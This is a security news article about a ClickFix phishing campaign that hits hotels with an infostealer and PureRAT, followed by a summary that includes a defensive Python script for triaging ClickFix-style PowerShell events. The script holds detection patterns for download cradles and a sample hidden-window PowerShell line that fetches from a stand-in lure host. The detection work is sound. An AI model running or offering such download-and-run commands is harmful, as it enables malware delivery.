LmCast :: Stay tuned in

ClickFix Campaign Targets Hotels, Spurs Secondary Customer Attacks

Recorded: Nov. 10, 2025, 6:04 p.m.

Original

News

Attackers compromise hospitality providers with an infostealer and RAT malware and then use stolen data to launch phishing attacks against customers via both email and WhatsApp.

Elizabeth Montalbano, Contributing Writer
November 10, 2025
4 Min Read

Researchers have uncovered a broad campaign in which threat actors target hotels with ClickFix attacks to steal customer data, part of ongoing attacks against the hospitality sector that include secondary attacks against the establishments' customers.

Threat analysts at Sekoia.io uncovered the activity when a partner alerted them to a phishing campaign that used either emails sent from a hotel's compromised Booking.com account or messages on WhatsApp, according to a report published Friday. Attackers had customer data, including personal identifiers and reservation details, which made their phishing attempts appear more legitimate.

After further analysis, the researchers realized the activity was part of a much broader campaign that started around April and was still active as of at least October: a ClickFix attack spreading infostealing malware that targeted hotels and other lodging establishments. The campaign enabled the theft of professional credentials granting access to booking platforms such as Booking.com and Expedia.

"Threat actors then either sold the harvested credentials on cybercrime forums or leveraged them directly to send fraudulent emails to hotel customers, often as part of banking fraud schemes," Jeremy Scion, Quentin Bourgue, and Sekoia Threat Detection Response (TDR) wrote in the report.
Moreover, they uncovered "hundreds of malicious domains active for several months as of October 2025, demonstrating a resilient and likely profitable campaign," according to the report.

Targeting Hospitality Sector

The initial attack against hotels uses a compromised email account to send malicious messages to multiple hotel establishments. In some instances, attackers alter the "From" header to impersonate Booking.com, while subject lines are often related to guest matters, including references to last-minute bookings, listings, reservations, and the like.

The attack chain then uses a redirection URL that ultimately leads to a ClickFix reCAPTCHA challenge in which users are prompted to copy a malicious PowerShell command. This command eventually leads to the deployment of infostealing and remote access Trojan (RAT) malware.

Sekoia.io cited March research from Microsoft that detailed attackers impersonating Booking.com in ClickFix attacks against hotels, noting that the campaigns are similar.

Cofense last June also detailed a ClickFix campaign targeting hotels that used guest-related lures similar to the ones Sekoia.io outlined. Cofense's report noted the attacks delivered various infostealing and RAT malware as well, demonstrating consistent attack activity against the hospitality sector using ClickFix.

ClickFix Multi-Malware Delivery

ClickFix is an attack method first detailed by researchers at Proofpoint last year in which a compromised website shows users fake error messages, tricking them into thinking they have to download or update software to address the issue. In reality, running the "update" executes malware on their devices.
Since its discovery, the vector has gained steady traction with threat actors.

In this campaign, the attack delivers infostealing malware that gathers various data from the compromised system, including key system information, and downloads files that lead to the launch of a RAT known as "PureRAT" for further malicious activity. The infostealer also reports status updates to its command-and-control (C2) infrastructure at each step of the attack to signal the successful progression of the action, the researchers noted.

PureRAT is a modular malware-as-a-service (MaaS) also known as PureHVNC and ResolverRAT. Once deployed, PureRAT's capabilities include remote user interface access, mouse and keyboard control, webcam and microphone capture, keylogging, file upload/download, traffic proxying, data exfiltration, and remote execution of commands or binaries, according to the Sekoia.io report.

Downstream Customer Attacks

The ClickFix attacks against hotels have led to secondary attacks against their customers, with attackers contacting them via WhatsApp or email using the target's legitimate reservation details, according to the researchers. "The message claimed an alleged security issue had occurred during the verification of the customer's banking details and urged them to confirm their information," they wrote. "To strengthen the credibility of the message, the attacker explained that this was a procedure implemented by Booking to protect against cancellations."

Attackers then ask victims to validate banking details by visiting a URL, which leads to a phishing page that mimics Booking.com's typography and layout and harvests the victim's banking information.
Avoiding ClickFix Scams

The campaign is further evidence of threat actors' growing effectiveness across various aspects of malicious activity, including social engineering in their targeting of Booking.com and hospitality sites, as well as the use of related lures and commodity malware sold on cybercrime forums.

To help defenders avoid compromise, Sekoia.io included a list of indicators of compromise (IoCs) in the post, including those associated with the ClickFix redirect URL, PowerShell URL, and payload; PureRAT staging and payload; and URLs involved in the phishing campaign against hotel customers.

As always, people should be suspicious of unsolicited emails related to services they frequently use and analyze them carefully, even if they appear to come from a credible sender or service provider.

About the Author

Elizabeth Montalbano, Contributing Writer. Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture.

Summarized

The ClickFix attack, initially detailed by researchers at Proofpoint, has evolved into a persistently effective tactic targeting hotels and, subsequently, their customers. Sekoia.io, in collaboration with a partner, uncovered a broad campaign originating around April 2025 and continuing through at least October 2025, centered on leveraging a compromised website to induce users into executing malicious code disguised as software updates. This "ClickFix" method relies on presenting users with fake error messages and prompting them to download and install malware. In this case, the malware delivered both an infostealing program and a Remote Access Trojan (RAT) known as "PureRAT".

The initial stage of the attack involves a compromised email account sending malicious messages to hotel establishments. These messages, often mimicking Booking.com communications regarding last-minute bookings, reservations, and similar guest-related issues, lead users to a ClickFix reCAPTCHA challenge. Completing this challenge prompts the execution of a PowerShell command, ultimately deploying the infostealing malware. This malware gathers system information, downloads files leading to the deployment of PureRAT, and regularly reports its progress to the attacker's command-and-control (C2) infrastructure. PureRAT itself is a modular "malware-as-a-service" (MaaS) platform, also known as PureHVNC or ResolverRAT, offering capabilities such as remote user interface access, keyboard and mouse control, webcam and microphone capture, keylogging, file upload/download, traffic proxying, data exfiltration, and the execution of further commands.
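A defender-side triage for the ClickFix step described in both the original article and this summary, added here as an example and not code from Sekoia.io or Dark Reading: it scores constructed Sysmon-style process-creation records for the paste-and-run PowerShell pattern (desktop-shell parent, hidden window, download cradle, "not a robot" comment). The signal list, weights, field names and sample command lines are assumptions for illustration, since the article does not print the campaign's actual command.

```python
# Heuristic ClickFix triage over Sysmon-style process-creation records.
# Added example, not Sekoia.io's or the article's code; the signals are assumed
# typical of ClickFix pastes (the article does not print the campaign's command).
import json
import re

SHELL_PARENTS = {"explorer.exe"}             # where a Win+R / Start paste lands
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# (name, pattern, weight) heuristics; weights are an assumption for this example.
SIGNALS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download_cradle", re.compile(r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|curl)\b", re.I), 2),
    ("captcha_comment", re.compile(r"#.*(?:captcha|robot|human|verif)", re.I), 3),
]

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()  # either slash style

def score_event(event):
    """Return (score, matched signal names) for one Sysmon-style event dict."""
    if (basename(event.get("Image", "")) not in POWERSHELL
            or basename(event.get("ParentImage", "")) not in SHELL_PARENTS):
        return 0, []   # PowerShell from cmd, scripts or schedulers is out of scope
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx, _ in SIGNALS if rx.search(cmd)]
    return sum(w for name, _, w in SIGNALS if name in hits), hits

def triage(jsonl, threshold=3):
    """Return [(ProcessId, score, hits)] for records scoring at or above threshold."""
    flagged = []
    for line in filter(str.strip, jsonl.splitlines()):
        ev = json.loads(line)
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append((ev.get("ProcessId"), score, hits))
    return flagged

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records: an admin session, a ClickFix-style paste, and a
# plain interactive shell opened from the desktop (should not be flagged).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ProcessId": 4100, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-Service"},
    {"ProcessId": 5221, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://lure.example.invalid/r"'
                    " # I am not a robot - reCAPTCHA Verification"},
    {"ProcessId": 5300, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe"},
])
```

Running `triage(SAMPLE_EVENTS)` flags only process 5221; in production the records would come from a SIEM export of Sysmon Event ID 1 or Security 4688 with command-line auditing enabled.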

The implications of this campaign extend beyond simply compromising hotel systems. Sekoia.io’s investigation revealed a secondary attack vector: targeting the customers of these hotels. Attackers utilized stolen reservation details—obtained through the initial hotel compromises—to launch phishing campaigns via WhatsApp or email. These messages, ostensibly from Booking.com, falsely claimed an alleged security issue during banking verification processes and urged victims to validate their banking information. This deception often led victims to a phishing page mirroring Booking.com’s design, harvesting their sensitive financial data.

Researchers identified hundreds of malicious domains active for several months, demonstrating the resilience and profitability of this ongoing campaign. The success of this tactic is indicative of a broader trend: the increasingly sophisticated use of social engineering techniques, the deployment of commodity malware via cybercrime forums, and the ability of threat actors to exploit vulnerabilities in established online booking platforms like Booking.com. Sekoia.io provided a suite of Indicators of Compromise (IoCs) to aid in detection and mitigation, including URLs associated with the ClickFix redirect, PowerShell commands, and payload files, as well as URLs involved in the phishing campaign against hotel customers. This highlights the importance of vigilance and active threat monitoring in the face of rapidly evolving cyber threats. The campaign underscores the need for organizations, particularly those in the hospitality sector, to implement robust security measures, including employee training, multi-factor authentication, and continuous monitoring to prevent and detect such attacks.